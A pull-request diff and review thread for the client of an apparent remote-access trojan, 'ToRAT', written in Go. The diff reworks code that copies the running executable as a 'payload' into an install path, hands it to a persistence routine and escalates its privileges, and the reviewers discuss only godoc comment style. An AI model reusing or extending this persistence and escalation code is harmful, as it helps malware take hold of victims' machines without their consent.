torat_client/setup.go

```diff
@@ -12,55 +12,74 @@ import (
 	"github.com/lu4p/go-escalate"
 )
 
-func copyExecuteable() error {
-	log.Println("copyExecuteable")
+// Setup add Persitence
+func SetupDaemon() {
+	log.Println("[SetupDaemon] Passing off to Daemon installer...")
+	go Persist(PathExe)
+}
 
+func installExecuteable() error {
 	if err := os.RemoveAll(Path); err != nil {
+		log.Println("[InstallExe] [!] Could NOT remove old executeable: ", err)
 		return err
 	}
-
-	log.Println("Removed Old Executeable")
+	log.Println("[InstallExe] Removed old executeable before install")
 
 	ex, err := os.Executable()
 	if err != nil {
+		log.Println("[InstallExe] [!] Couldn't find the currently running exe: ", err)
 		return err
 	}
 
 	data, err := ioutil.ReadFile(ex)
 	if err != nil {
+		log.Println("[InstallExe] [!] Could not read current exe: ", err)
 		return err
 	}
 
 	if err = os.MkdirAll(Path, os.ModePerm); err != nil {
+		log.Println("[InstallExe] [!] Could not create path for new exe: ", err)
+		return err
+	}
+
+	if err = ioutil.WriteFile(PathExe, data, os.ModePerm); err != nil {
+		log.Println("[InstallExe] [!] Could not write exe to path: ", err)
 		return err
 	}
 
-	return ioutil.WriteFile(PathExe, data, os.ModePerm)
+	return nil
 }
 
 // Elevate elevate task
 func Elevate() error {
-	log.Println("Elevate")
-	err := copyExecuteable()
+	log.Println("[Elevate] Installing payload into: ", PathExe)
+
+	err := installExecuteable()
 	if err != nil {
-		return errors.New("copy failed")
+		return errors.New("[Elevate] [!] Could NOT copy payload into target path")
+	} else {
+		log.Println("[Elevate] [+] Successfully copied payload into target path")
 	}
+
+	// Escalate exe and return
 	return escalate.Escalate(PathExe)
 }
 
 // CheckSetup check wheter already configured
```

Comment:
Also update the comment for godoc, if you change the name.

(also others)

Reply:
Sorry about that, I'm am still learning Golang. Not very familiar with the doc standards and stuff

Reply:
It's relatively simple see https://blog.golang.org/godoc

Reply:
Would you be willing to give me an example of what you mean? I am very familiar with docstrings just not really in this context. For example with python functions are started with docstring, but this is just a comment at the end of a function. Guess im not sure what exactly I should be updating? Thanks

Reply:
// CheckExistingInstall check whether an installation exists already

Reply:
O so not this line, just in general update docstrings. Sure